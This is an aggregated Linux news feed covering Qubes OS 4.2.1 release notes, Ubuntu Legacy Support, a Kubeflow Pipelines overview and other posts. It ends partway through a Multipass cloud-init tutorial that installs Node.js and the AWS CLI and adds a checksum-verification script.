<h3 class="wp-block-heading">Get started with Charmed MongoDB</h3>
<p>To get started with Charmed MongoDB, users can refer to the documentation available at <a href="https://charmhub.io/mongodb">Charmhub</a>. For more information about Charmed MongoDB, visit <a href="http://canonical.com/data/mongodb">canonical.com/data/mongodb</a>.</p>
<p>Canonical is also delighted to offer <a href="https://assets.ubuntu.com/v1/cfecb9cd-Charmed%20MongoDB%20Training_Public%20Module-4.pdf">Charmed MongoDB training</a> in collaboration with <a href="https://cloudbase.it/">Cloudbase Solutions</a>. This program is designed to help individuals get started with Charmed MongoDB through in-person or virtual training.</p>
<h3 class="wp-block-heading">Additional resources</h3>
<p><a href="https://ubuntu.com/engage/mongodb-for-enterprises">Webinar: MongoDB® for Modern Data Management</a></p>
<p><a href="https://ubuntu.com/engage/mongodb-support-security">Whitepaper: MongoDB® Security and Support</a></p>
<p><a href="https://ubuntu.com/engage/mongodb-enterprise-data-management">Whitepaper: MongoDB® for enterprise data management</a></p>
<p><a href="https://assets.ubuntu.com/v1/eb8bfa49-Managed%20MongoDB_DS%20(1)-1.pdf">Learn more about Charmed MongoDB Managed Service</a></p>
<p><a href="https://assets.ubuntu.com/v1/4220f815-Data%20Solutions%20Advisory%20version%20_updated%20-%20v3-2.pdf">Learn more about Data Solutions Advisory at Canonical</a></p>
<p><strong><br />Trademark Notice</strong><br /><br />“MongoDB” is a trademark or registered trademark of MongoDB Inc. Other trademarks are property of their respective owners. Charmed MongoDB is not sponsored, endorsed, or affiliated with MongoDB, Inc.</p>Ubuntu developershttp://planet.ubuntu.com/Qubes OS 4.2.1 has been released!https://www.qubes-os.org/news/2024/03/26/qubes-os-4-2-1-has-been-released/2024-03-26T00:00:00+00:00<p>We’re pleased to announce the stable release of Qubes OS 4.2.1! This <a href="https://www.qubes-os.org/feed.xml#what-is-a-patch-release">patch release</a> aims to consolidate all the security patches, bug fixes, and other updates that have occurred since the release of Qubes 4.2.0. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO. The ISO and associated <a href="https://www.qubes-os.org/security/verifying-signatures/">verification files</a> are available on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page.</p>
<h2 id="whats-new-in-qubes-os-421">What’s new in Qubes OS 4.2.1?</h2>
<p>Qubes 4.2.1 includes numerous updates over the initial 4.2.0 release, in particular:</p>
<ul>
<li>All 4.2 dom0 updates to date</li>
<li>Fedora 39 template</li>
<li>Linux 6.6.x as the default kernel, significantly reducing the need for <code class="language-plaintext highlighter-rouge">kernel-latest</code> on newer systems</li>
</ul>
<p>For more information about the changes included in this version, see the <a href="https://github.com/QubesOS/qubes-issues/issues?q=is%3Aissue+is%3Aclosed+reason%3Acompleted+closed%3A2023-12-18..2024-03-14+-label%3A%22R%3A+cannot+reproduce%22+-label%3A%22R%3A+declined%22+-label%3A%22R%3A+duplicate%22+-label%3A%22R%3A+not+applicable%22+-label%3A%22R%3A+self-closed%22+-label%3A%22R%3A+upstream+issue%22+">full list of issues completed since the release of 4.2.0</a>.</p>
<h2 id="how-to-get-qubes-os-421">How to get Qubes OS 4.2.1</h2>
<p>You have a few different options, depending on your situation:</p>
<ul>
<li>
<p>If you’d like to install Qubes OS for the first time or perform a clean reinstallation on an existing system, there’s never been a better time to do so! Simply <a href="https://www.qubes-os.org/downloads/">download</a> the Qubes 4.2.1 ISO and follow our <a href="https://www.qubes-os.org/doc/installation-guide/">installation guide</a>.</p>
</li>
<li>
<p>If you’re currently on Qubes 4.1, learn <a href="https://www.qubes-os.org/doc/upgrade/4.2/">how to upgrade to Qubes 4.2</a>.</p>
</li>
<li>
<p>If you’re currently on Qubes 4.2 (including 4.2.0 and 4.2.1-rc1), <a href="https://www.qubes-os.org/doc/how-to-update/">update normally</a> (which includes <a href="https://www.qubes-os.org/doc/how-to-update/#upgrading-to-avoid-eol">upgrading any EOL templates</a> you might have) in order to make your system essentially equivalent to the stable Qubes 4.2.1 release. No reinstallation or other special action is required.</p>
</li>
</ul>
<p>In all cases, we strongly recommend <a href="https://www.qubes-os.org/doc/how-to-back-up-restore-and-migrate/">making a full backup</a> beforehand.</p>
<h2 id="reminder-new-signing-key-for-qubes-os-42">Reminder: new signing key for Qubes OS 4.2</h2>
<p>As a reminder, we published the following special announcement in <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">Qubes Canary 032</a> on 2022-09-14:</p>
<blockquote>
<p>We plan to create a new Release Signing Key (RSK) for Qubes OS 4.2. Normally, we have only one RSK for each major release. However, for the 4.2 release, we will be using Qubes Builder version 2, which is a complete rewrite of the Qubes Builder. Out of an abundance of caution, we would like to isolate the build processes of the current stable 4.1 release and the upcoming 4.2 release from each other at the cryptographic level in order to minimize the risk of a vulnerability in one affecting the other. We are including this notice as a canary special announcement since introducing a new RSK for a minor release is an exception to our usual RSK management policy.</p>
</blockquote>
<p>As always, we encourage you to <a href="https://www.qubes-os.org/security/pack/#how-to-obtain-and-authenticate">authenticate</a> this canary by <a href="https://www.qubes-os.org/security/verifying-signatures/">verifying its PGP signatures</a>. Specific instructions are also included in the <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">canary announcement</a>.</p>
<p>As with all Qubes signing keys, we also encourage you to <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-release-signing-keys">authenticate</a> the new Qubes OS Release 4.2 Signing Key, which is available in the <a href="https://www.qubes-os.org/security/pack/">Qubes Security Pack (qubes-secpack)</a> as well as on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page.</p>
<h2 id="what-is-a-patch-release">What is a patch release?</h2>
<p>The Qubes OS Project uses the <a href="https://semver.org/">semantic versioning</a> standard. Version numbers are written as <code class="language-plaintext highlighter-rouge">&lt;major&gt;.&lt;minor&gt;.&lt;patch&gt;</code>. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.2) inclusive of all updates up to a certain point. (See <a href="https://www.qubes-os.org/doc/supported-releases/">supported releases</a> for a comprehensive list of major and minor releases.) Installing the initial Qubes 4.2.0 release and fully <a href="https://www.qubes-os.org/doc/how-to-update/">updating</a> it results in essentially the same system as installing Qubes 4.2.1. You can learn more about how Qubes release versioning works in the <a href="https://www.qubes-os.org/doc/version-scheme/">version scheme</a> documentation.</p>Qubeshttps://www.qubes-os.org/Qubes OS 4.1 reaches EOL on 2024-06-18https://www.qubes-os.org/news/2024/03/26/qubes-os-4-1-reaches-eol-on-2024-06-18/2024-03-26T00:00:00+00:00<p>Qubes OS 4.1 is scheduled to reach <a href="https://www.qubes-os.org/feed.xml#what-does-end-of-life-eol-mean">end-of-life (EOL)</a> on 2024-06-18, approximately three months from the date of this announcement.</p>
<h2 id="recommended-actions">Recommended actions</h2>
<p>If you’re already using Qubes 4.2, then you don’t have to do anything. This announcement doesn’t affect you.</p>
<p>If you’re still using Qubes 4.1, then now is the perfect opportunity to upgrade, since a brand new <a href="https://www.qubes-os.org/news/2024/03/26/qubes-os-4-2-1-has-been-released/">Qubes OS 4.2.1 ISO was just released today</a>! (This is also the best way to get started with Qubes if you don’t have it installed yet.)</p>
<p>If you’d prefer not to reinstall, you can instead perform an <a href="https://www.qubes-os.org/doc/upgrade/4.2/#in-place-upgrade">in-place upgrade from Qubes 4.1 to 4.2</a>.</p>
<p>Whichever option you choose, we strongly recommend <a href="https://www.qubes-os.org/doc/how-to-back-up-restore-and-migrate/">making a full backup</a> beforehand and ensuring you’re on Qubes 4.2 by 2024-06-18.</p>
<h2 id="what-does-end-of-life-eol-mean">What does end-of-life (EOL) mean?</h2>
<p>When a Qubes OS release reaches end-of-life (EOL), it is no longer supported. This means that bugs discovered in that release will no longer be fixed, and enhancements will no longer be added. Most importantly, releases that have reached EOL no longer receive security updates, which is why it’s critically important to upgrade to a supported release.</p>
<h2 id="what-about-patch-releases">What about patch releases?</h2>
<p>The Qubes OS Project uses the <a href="https://semver.org/">semantic versioning</a> standard. Version numbers are written as <code class="language-plaintext highlighter-rouge">&lt;major&gt;.&lt;minor&gt;.&lt;patch&gt;</code>. When a major or minor release reaches EOL, all of its patch releases also reach EOL. For example, in this case, when we say that “Qubes 4.1” (without specifying a <code class="language-plaintext highlighter-rouge">&lt;patch&gt;</code> number) is approaching EOL, we’re specifying a particular minor release, inclusive of all patch releases within it. This means that Qubes 4.1.0, 4.1.1, and 4.1.2 will all reach EOL at the same time (on 2024-06-18), since they are all just patch releases of the same minor release.</p>
<h2 id="how-are-eol-dates-determined">How are EOL dates determined?</h2>
<p>According to our <a href="https://www.qubes-os.org/doc/supported-releases/">support policy</a>, stable Qubes OS releases are supported for six months after each subsequent <a href="https://www.qubes-os.org/doc/version-scheme/">major or minor release</a>. This means that Qubes 4.1 reaches EOL six months after Qubes 4.2 was released. Since Qubes 4.2.0 was <a href="https://www.qubes-os.org/news/2023/12/18/qubes-os-4-2-0-has-been-released/">released on 2023-12-18</a>, Qubes 4.1’s EOL date is six months later, on 2024-06-18.</p>Qubeshttps://www.qubes-os.org/The Fridge: Ubuntu Weekly Newsletter Issue 832https://fridge.ubuntu.com/?p=101192024-03-25T22:04:59+00:00<figure class="wp-block-image"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2020/02/c9d7/header.png" /></figure>
<p>Welcome to the Ubuntu Weekly Newsletter, <strong>Issue 832 for the week of March 17 – 23, 2024</strong>. The full version of this issue is available <a href="https://discourse.ubuntu.com/t/ubuntu-weekly-newsletter-issue-832/43450">here</a>.</p>
<p>In this issue we cover:</p>
<ul><li>Ubuntu Stats</li><li>Hot in Support</li><li>FLISoL San José de Pare – El primer FLISoL del año en Colombia</li><li>LoCo Events</li><li>March 8, Women’s Day – Marzo 8, Día Internacional de la Mujer – Bogotá, Colombia</li><li>Ubuntu Studio: Wallpaper Competition Winners 24.04 LTS</li><li>Ubuntu Cloud News</li><li>Canonical News</li><li>In the Blogosphere</li><li>Other Articles of Interest</li><li>Featured Audio and Video</li><li>Meeting Reports</li><li>Upcoming Meetings and Events</li><li>Updates and Security for Ubuntu 20.04, 22.04, and 23.10</li><li>And much more!</li></ul>
<p><strong>The Ubuntu Weekly Newsletter is brought to you by:</strong></p>
<ul><li>Krytarik Raido</li><li>Bashing-om</li><li>Chris Guiver</li><li>Wild Man</li><li>And many others</li></ul>
<p>If you have a story idea for the Weekly Newsletter, join the <a href="https://lists.ubuntu.com/mailman/listinfo/Ubuntu-news-team">Ubuntu News Team mailing list</a> and submit it. Ideas can also be added to the <a href="https://wiki.ubuntu.com/UbuntuWeeklyNewsletter/Ideas">wiki</a>!</p>
<div class="wp-block-image"><figure class="alignleft"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2015/05/ab28/CCL.png" /></figure></div>
Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical expands Long Term Support to 12 years starting with Ubuntu 14.04 LTShttps://ubuntu.com//blog/canonical-expands-long-term-support-to-12-years-starting-with-ubuntu-14-04-lts2024-03-25T15:59:23+00:00<p>Today, Canonical announced the general availability of Legacy Support, an Ubuntu Pro add-on that expands security and support coverage for Ubuntu LTS releases to 12 years. The add-on will be available for Ubuntu 14.04 LTS onwards. </p>
<p>Long term supported Ubuntu releases get five years of standard security maintenance on the main Ubuntu repository. Ubuntu Pro expands that commitment to 10 years on both the main and universe repositories, providing enterprises and end users alike access to a vast secure open source software library. The subscription also comes with a phone and ticket support tier. Ubuntu Pro paying customers can purchase an extra two years of security maintenance and support with the new Legacy Support add-on. </p>
<p>“We’re thrilled to offer our customers additional years of security maintenance and support for Ubuntu LTS releases”, said Maximilian Morgan, Global VP of Support Engineering at Canonical. “Drawing on 20 years of excellence in open source, Canonical delivers expert security maintenance and support for customers around the world. With Legacy Support, we empower organisations to navigate their operational needs and investments into open source with confidence, ensuring their systems remain available, secure, and supported for many years to come”. </p>
<h2 class="wp-block-heading">Ideal for stability and peace of mind</h2>
<p>Running the latest operating system (OS) offers new features and enhanced performance, which is a good choice for new deployments. However, for large, established production systems, the transition to a new OS version presents a challenge as it may involve updating the entire software stack running on top of it. This complexity is amplified by modern software architectures that incorporate containerisation, microservices, extensive data management features, as well as integration with third-party APIs. </p>
<p>Given these multifaceted challenges, ensuring the system remains operational, secure, and supported is paramount. Organisations looking to gain peace of mind and stability while they plan and execute their migration strategy can trust Canonical.</p>
<h2 class="wp-block-heading">12 years of timely security fixes and support</h2>
<p>Security maintenance is part of a continuous process that proactively protects systems. It includes regular vulnerability scanning, evaluation and patch management. With Ubuntu Pro, Canonical provides continuous vulnerability management for critical, high and medium Common Vulnerabilities and Exposures (CVEs) across all software packages shipped with Ubuntu. Canonical’s security team actively backports these crucial fixes to all supported Ubuntu LTS releases, giving enterprises and end users peace of mind to keep their systems secure without requiring a major upgrade.</p>
<p>Support is a user-triggered service that comes into play when incidents occur or additional expertise is required to address complex issues. Customers looking to strengthen their business continuity strategy with open source expertise can rely on Canonical support for troubleshooting, break fixes, bug fixes and guidance.</p>
<h2 class="wp-block-heading">Available for Ubuntu 14.04 LTS Trusty Tahr and future LTS releases</h2>
<p>Ubuntu Pro coverage for Ubuntu 14.04 LTS will end in April 2024. With Legacy Support, organisations running their systems on top of Ubuntu 14.04 LTS can obtain an additional two years of expanded security maintenance and phone and ticket support. This enables IT managers to prepare a detailed upgrade plan for the next LTS, and software architects to concentrate on the application level with the support offered by Canonical’s team.</p>
<p>Learn more about Ubuntu Pro and the Legacy Support add-on at <a href="https://ubuntu.com/pro">https://ubuntu.com/pro</a>, <a href="https://ubuntu.com/support">https://ubuntu.com/support</a> or <a href="https://ubuntu.com/support/contact-us?product=support-overview">contact Canonical</a> for more information.</p>Ubuntu developershttp://planet.ubuntu.com/(Chinese) Packed with useful content! The March 2024 WHLUG wrapped up successfully: a recap of the themed talks!https://www.deepin.org/?p=334032024-03-25T08:54:27+00:00Sorry, this entry is only available in Chinese.aidahttps://www.deepin.org/enUbuntu Blog: A deep dive into Kubeflow pipelineshttps://ubuntu.com//blog/deep-dive-kubeflow-pipelines2024-03-25T06:01:24+00:00<p>Widely adopted by both developers and organisations, Kubeflow is an MLOps platform that runs on Kubernetes and automates machine learning (ML) workloads. It covers the entire ML lifecycle, enabling data scientists and machine learning engineers to develop and deploy ML models. Kubeflow is designed as a suite of leading open source projects that enable different capabilities such as model serving, training or hypertuning optimisations.</p>
<p>At Canonical, we deliver <a href="https://charmed-kubeflow.io/">Charmed Kubeflow</a> – an official distribution of the upstream solution with additional security maintenance, tool integrations, and enterprise support and managed services – so we know a thing or two about the project. In our experience, one of the most important concepts to understand with respect to both Kubeflow itself and the broader ML lifecycle is machine learning pipelines. Taking advantage of pipelines is the best way to effectively deploy models at scale in production, so let’s break down this critical component in the MLOps landscape.</p>
<h1 class="wp-block-heading">What is an ML pipeline?</h1>
<p>A machine learning pipeline is an important component of ML systems, ensuring simplified experimentation and the capability to take models to production. It is a series of steps that automate how ML models are created, in order to streamline the workflow, development and deployment. ML pipelines simplify the complexity of the end-to-end ML lifecycle, helping professionals to develop and deploy models. Amongst their benefits, ML pipelines ensure scalability thanks to their ability to handle large volumes of data while supporting collaboration and reproducibility.</p>
<p>A core value of MLOps platforms such as Kubeflow is that they enable professionals to build and maintain ML pipelines.</p>
<h1 class="wp-block-heading">What is Kubeflow Pipelines?</h1>
<p>Kubeflow Pipelines or KFP is the heart of Kubeflow. It is a Kubeflow component that enables the creation of ML pipelines. It is used to help you build and deploy container-based ML workflows that are portable and scalable. The main goals of Kubeflow Pipelines are to simplify the following processes:</p>
<ul>
<li>Orchestration of the end-to-end ML pipelines</li>
<li>Experimentation with various ideas and techniques</li>
<li>Experiment management </li>
<li>Reuse of components and pipelines to enable users to quickly put together end-to-end solutions without having to re-build each time</li>
</ul>
<h3 class="wp-block-heading">Components of Kubeflow Pipelines</h3>
<p>Kubeflow Pipelines is part of the Kubeflow project. It can be used as part of the project or as an independent tool. It is made of 3 main components:</p>
<ul>
<li>User interface (UI) for managing and tracking experiments, jobs, and runs</li>
<li>Engine for scheduling multi-step ML workflows</li>
<li>SDK for defining and manipulating pipelines and components</li>
</ul>
<h1 class="wp-block-heading">Kubeflow Pipelines use cases</h1>
<p>Kubeflow Pipelines is typically most useful for advanced users of Kubeflow or professionals who already have experience with machine learning. You don’t necessarily need KFP in the experimentation phase of the ML journey, but it becomes useful when you want to take your models to production. The main use cases for KFP include:</p>
<ul>
<li><strong>Workflow automation: </strong>Data scientists and machine learning engineers often perform a lot of the initial experimentation phase manually to better understand optimisation possibilities and quickly iterate. But once they have defined their workflow, they can use KFP to automate the process and save time.</li>
<li><strong>Model deployment to production: </strong>Models are usually compiled in a binary file. Traditionally, for the model to be loaded to a server where the requirements for inference are met, this file would be manually copied to the machine that hosts the application. KFP simplifies this process by enabling you to build automated pipelines to multiple applications or servers.</li>
<li><strong>Model maintenance and updates: </strong>The ML lifecycle is an iterative process and models need to be updated periodically. KFP helps users run updates and rollbacks across multiple applications or servers. Once the model is updated in one place and the update transaction is complete, KFP ensures the update is quickly applied to all client applications. </li>
<li><strong>Multi-tenant ML environment: </strong>Organisations often have large data and ML teams that need to share their resources. KFP enables simple and effective sharing of the environment, where each collaborator gets an isolated environment. It is then utilised by the K8s cluster and tools such as <a href="https://volcano.sh/en/">Volcano</a> to schedule resources or manage containers. This helps professionals isolate workflows and keep track of pending and running jobs for each collaborator.<strong> </strong></li>
</ul>
<h1 class="wp-block-heading">Benefits of KFP</h1>
<p>Among machine learning specialists, Kubeflow Pipelines is widely adopted for a number of reasons. The most important benefits of KFP include:</p>
<ul>
<li><strong>Streamlined workflow automation: </strong>Kubeflow Pipelines allows users to define the machine learning pipelines as a sequence of steps, each with its input, output, and dependencies. This leads to streamlining the machine learning workflows, and reduces the overhead and complexity of managing and executing your pipelines.</li>
<li><strong>Improved collaboration: </strong>Kubeflow Pipelines provides a central and shared platform for data scientists, machine learning engineers, and IT operations teams to collaborate on machine learning projects. It allows them to share pipelines and artifacts with others, and enables the tracking and monitoring of the pipelines across the entire organisation.</li>
<li><strong>Enhanced performance and scalability</strong>: Kubeflow Pipelines runs on Kubernetes, which provides a scalable and flexible infrastructure for running machine learning pipelines and models. This allows you to easily scale up and down the pipelines, and ensure that your pipelines are performant and reliable.</li>
<li><strong>Resource optimisation: </strong>KFP is a cloud native application, so it can leverage the resource schedulers that Kubernetes platforms provide. This leads to optimised usage of the existing resources and faster project delivery.</li>
<li><strong>Extensive support for popular machine learning frameworks: </strong>KFP provides built-in support for popular machine learning frameworks like TensorFlow, PyTorch, and XGBoost, as well as a rich ecosystem of integrations and plugins for other tools and services. Charmed Kubeflow goes a step further and enables additional integrations with tools and frameworks such as NVIDIA NGC Containers, Triton Inference Server and MLflow.</li>
</ul>
<p>Although Kubeflow Pipelines is a feature-rich tool, it still poses some challenges for beginners. It comes with a steep learning curve and there is limited documentation available. Since it is a fully open source tool, there is a big community that can help beginners, but it can be frustrating at times. You can alleviate these challenges by taking advantage of enterprise support or managed services from organisations which distribute Kubeflow.</p>
<h1 class="wp-block-heading">Architecture of Kubeflow Pipelines</h1>
<p>Kubeflow Pipelines is a complex component with capabilities that unblock users and enable them to automate their workflows and reduce their time spent on manual tasks. The following architecture depicts these capabilities: </p>
<p class="has-text-align-center">
</p><div class="lazyload">
<noscript>
<img alt="" height="631" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_624,h_631/https://lh7-us.googleusercontent.com/yaQetfLIWcA6IyckPfMzNgnYGHag1A3iKxncQV-Iziq768cvFJ3ezjg6uZZ9oiaZsXzEFBF5g55WUM_nfaX0lVAqrM07Z3Yy3TAfwXzGePpfCMdflzxa9T3kGS8XpvCJVDZIeBFc-VLV4uR1-eYPWVQ" width="624" />
</noscript>
</div>
<p></p>
<p class="has-text-align-center"><a href="https://ubuntu.com/blog/Kubeflow community" rel="noreferrer noopener" target="_blank">source: Kubeflow community</a></p>
<p>As the diagram illustrates, users can interact with KFP either through the user interface or through development tools such as Notebooks. Initially, users create components or specify a pipeline using the Kubeflow Pipelines domain-specific language (<a href="https://github.com/kubeflow/pipelines/tree/sdk/release-1.8/sdk/python/kfp/dsl">DSL</a>). Once defined, the compiler transforms the Python code into a static YAML configuration. Then, the Pipeline Service creates a pipeline run from the static configuration. It calls the Kubernetes API server to create the Kubernetes resources (<a href="https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/">CRDs</a>) needed to run the pipeline. If you have a resource scheduler integrated, you can use it to run the pipeline when resources are available or at a desired time. To complete the pipeline, the containers are executed within the Kubernetes pods, using orchestration controllers.</p>
<p>Two types of data can be stored. The first type is metadata, which includes experiments, jobs, pipeline runs, and single scalar metrics. The second type is artefacts, which includes pipeline packages, views, and large-scale metrics (time series). Metadata is stored in a MySQL database, whereas artefacts are stored within MinIO. Storing them in an external component also enables portability, so artefacts can be migrated to different clusters or environments.</p>
<p>Kubernetes resources created by the Pipeline Service are monitored by the Persistence Agent. To enable reproducibility, the inputs and outputs of the containers are recorded. These consist of parameters or data artefact URIs and are treated as metadata. Recording them lets professionals reuse the configurations to replicate different tasks and check whether the results match.</p>
<p>The Pipeline web server gives users a visual understanding of the steps in their Kubeflow Pipelines. It presents various information, including the list of pipelines currently running, the history of pipeline executions, data artefacts, and logs for debugging.</p>
<h1 class="wp-block-heading">Get started with Kubeflow Pipelines</h1>
<p>In order to access Kubeflow Pipelines, users can either deploy them independently or as part of the Kubeflow project. For simplified deployment, we recommend using Charmed Kubeflow.</p>
<ol>
<li>Deploy Charmed Kubeflow following the <a href="https://charmed-kubeflow.io/docs/get-started-with-charmed-kubeflow">tutorial</a>. You can do it on any environment, including public cloud or on-prem. Ensure that you have enough resources available, so you do not run into problems along the way.</li>
<li>Access the Kubeflow dashboard. In case you are accessing it from a VM or from a public cloud, please ensure that you <a href="https://charmed-kubeflow.io/docs/how-tosetup-ssh-vm-access-with-port-forwarding">change the SOCKS proxy settings.</a> There you will have different options, including to upload an existing pipeline or create a new one.</li>
<li>Clone this repository from <a href="https://github.com/canonical/kubeflow-examples/tree/main/e2e-wine-kfp-mlflow">GitHub</a>, which contains a simple example of how to use some of the components of Kubeflow.</li>
<li>Access the examples from the Notebook. There are several pipelines created which you can run, edit or play with. Of course, they are just examples. In order to build your own pipeline, check the official documentation of the Kubeflow project.</li>
</ol>
<h3 class="wp-block-heading">Further reading</h3>
<p><a href="https://ubuntu.com/blog/kubeflow-vs-mlflow">Kubeflow vs MLflow</a></p>
<p><a href="https://charmed-kubeflow.io/docs/launch-ngc-notebooks">Launch NGC containers with Kubeflow</a></p>
<p><a href="https://ubuntu.com/blog/mlops-pipeline-with-mlflow-seldon-core-and-kubeflow-pipelines">MLOps pipelines with Kubefow, MLflow and Seldon</a></p>Ubuntu developershttp://planet.ubuntu.com/Stuart Langridge: The Matrix has you, part 2tag:www.kryogenix.org,2024-03-24:/days/2024/03/24/the-matrix-has-you-part-2/2024-03-24T15:40:00+00:00<p>I’ve recently <a href="https://mastodon.social/@sil/112144967827317228">switched back from vscode to Sublime Text</a>, which means that after all the time I spent training my fingers to type “<code>code somefile.txt</code>” instead of “<code>subl somefile.txt</code>” I now need to undo all that conditioning and go back to <code>subl</code> again. So I thought, hey, maybe I should dump a little shell script called <code>code</code> in my <code>bin</code> folder which admonished me in some amusing way, thus Pavlov-ing myself into learning to do it right.</p>
<p>And then I thought, hey, what’d be cool is if I had that Matrix-esque “raining code” effect in the Terminal and then it was superimposed with a box saying “<span class="caps">STOP</span> <span class="caps">TYPING</span> code <span class="caps">AND</span> <span class="caps">USE</span> subl <span class="caps">INSTEAD</span>”, like the “<span class="caps">SYSTEM</span> <span class="caps">ERROR</span>” message at the end of the first movie.</p>
<p>And then I thought: someone’s already done this, right? And they have; it is called <a href="https://github.com/abishekvashok/cmatrix"><code>cmatrix</code></a>. But I don’t like cmatrix because it doesn’t do the colours right; the text just sorta stops rather than fading away like the movie does, and it feels unreal and too sharp for me. Now, don’t get me wrong, I understand why this is; terminals support a full proper range of colour these days, but writing a program which gets released to actual people and which can deal with the bewildering array of terminal settings out there is a miserable waste of everyone’s time. But I’m not writing this for anyone else; it only has to work in <em>my</em> terminal (in true <a href="https://www.kryogenix.org/days/2007/03/18/works-on-my-machine/">works on my machine</a> fashion). And this will give me a chance to noodle about with Python terminal libraries such as <a href="https://pypi.org/project/blessed/">blessed</a> to make something interesting. Hence, <a href="https://kryogenix.org/random/matrix24.py">matrix24.py</a>:</p>
<video controls="controls" src="https://kryogenix.org/random/matrix-24bit.mp4"></video>
<p>It’s a bodge all round, and it still doesn’t look right, and <a href="http://jessica.tech/">Jess</a> pointed out that making something cool happen when I make a mistake is the opposite of conditioning, but I got to fiddle about with a new library for a bit, so that was fun. Can I do something productive now?</p>
<p>(title from <a href="https://www.kryogenix.org/days/2003/06/18/mtrx/">a classic post about the Matrix</a> which still makes me laugh even after all these years, although it is very unfair to Keanu Reeves who is a cool bloke and should be emulated in his approach to life)</p>Ubuntu developershttp://planet.ubuntu.com/Dougie Richardson: Multipass cloud-inithttps://dougiewougie.com/?p=27212024-03-24T13:30:47+00:00<p><a href="https://multipass.run/">Multipass</a> is pretty useful but what a pain this was to figure out, due to Ubuntu’s Node.js package not working with AWS-CDK.</p>
<p>Multipass lets you manage VMs in Ubuntu and <a href="https://ubuntu.com/blog/using-cloud-init-with-multipass">can take cloud-init</a> scripts as a parameter. I wanted an Ubuntu LTS instance with AWS CDK, which needs <code>Node.js</code> and <code>python3-venv</code>.</p>
<pre class="wp-block-code"><code class="language-yaml line-numbers" lang="yaml">#cloud-config
packages:
- python3-venv
- unzip
package_update: true
package_upgrade: true
write_files:
- path: "/etc/environment"
append: true
content: |
export PATH=\
/opt/node-v20.11.1-linux-x64/bin:\
/usr/local/sbin:/usr/local/bin:\
/usr/sbin:/usr/bin:/sbin:/bin:\
/usr/games:/usr/local/games:\
/snap/bin
runcmd:
- wget https://nodejs.org/dist/v20.11.1/node-v20.11.1-linux-x64.tar.xz
- tar xvf node-v20.11.1-linux-x64.tar.xz -C /opt
- export PATH=/opt/node-v20.11.1-linux-x64/bin:$PATH
- npm install -g npm@latest
- npm install -g aws-cdk
- git config --system user.name "Dougie Richardson"
- git config --system user.email "xx@xxxxxxxxx.com"
- git config --system init.defaultBranch main
- wget https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip
- unzip awscli-exe-linux-x86_64.zip
- ./aws/install</code></pre>
<p>Save that as cdk.yaml and spin up a new instance:</p>
<pre class="wp-block-code"><code class="language-bash" lang="bash">multipass launch --name cdk --cloud-init cdk.yaml</code></pre>
<figure class="wp-block-image size-full"><img alt="Success!" class="wp-image-2723" height="200" src="https://dougiewougie.com/wp-content/uploads/2024/03/Screenshot-from-2024-03-24-12-44-52-e1711284497926.png" width="478" /></figure>
<p>There’s a couple useful things to note if you’re checking this out:</p>
<ul>
<li>Inside the VM there’s a useful log to assist debugging <code>/var/log/cloud-init-output.log</code>.</li>
<li>While YAML has lots of ways to split text over multiple lines, when you don’t want space use a backslash.</li>
</ul>
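<p>The <code>runcmd</code> section above unpacks a downloaded archive straight into <code>/opt</code>. As an added example (not part of the original post), the shell function below unpacks an archive only when its SHA-256 matches a digest pinned in the provisioning script; the function names and the <code>NODE_SHA256</code> variable are hypothetical, and the archive used in the self-check is constructed locally.</p>

```shell
#!/bin/sh
# Added example: refuse to unpack a downloaded archive unless its SHA-256
# matches a digest pinned in the provisioning script.
#
# Hypothetical use from cloud-init runcmd, after the wget step:
#   unpack_pinned node-v20.11.1-linux-x64.tar.xz "$NODE_SHA256" /opt
# where NODE_SHA256 is a digest you recorded yourself from the release's
# published checksum list (placeholder: this page does not give the value).

# sha256_of FILE: print the lowercase hex SHA-256 of FILE.
sha256_of() {
    sha256sum "$1" | awk '{ print tolower($1) }'
}

# unpack_pinned ARCHIVE EXPECTED_SHA256 DEST_DIR
# Returns 0 after extracting, 1 on digest mismatch, 2 on bad arguments.
unpack_pinned() {
    archive=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    dest=$3

    [ -f "$archive" ] && [ -d "$dest" ] || return 2

    # A pinned digest must be exactly 64 hex characters. An empty variable
    # or a truncated paste is an error, never an implicit "skip the check".
    case "$expected" in
        *[!0-9a-f]*) return 2 ;;
    esac
    [ "${#expected}" -eq 64 ] || return 2

    actual=$(sha256_of "$archive")
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $archive: got $actual" >&2
        return 1
    fi

    # Only reached when the digest matched.
    tar -xf "$archive" -C "$dest"
}

# Self-check on a constructed archive: the intact file unpacks, a modified
# copy of the same file is refused.
self_check() {
    work=$(mktemp -d) || return 1
    mkdir "$work/src" "$work/opt"
    echo "constructed payload" > "$work/src/hello.txt"
    tar -cf "$work/pkg.tar" -C "$work/src" hello.txt
    pinned=$(sha256_of "$work/pkg.tar")

    unpack_pinned "$work/pkg.tar" "$pinned" "$work/opt" \
        && echo "intact archive: unpacked"

    echo "tampered" >> "$work/pkg.tar"
    unpack_pinned "$work/pkg.tar" "$pinned" "$work/opt" 2>/dev/null \
        || echo "modified archive: refused"

    rm -rf "$work"
}

self_check
```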
<p>Shell into the new VM with <code>multipass shell cdk</code>, then we can configure programmatic access and bootstrap CDK.</p>
<pre class="wp-block-code"><code class="language-bash" lang="bash">aws sso configure
aws sso login --profile profile_name
aws sts get-caller-identity --profile profile_name
aws configure get region --profile profile_name</code></pre>
<p>The last two commands give the account and region to bootstrap:</p>
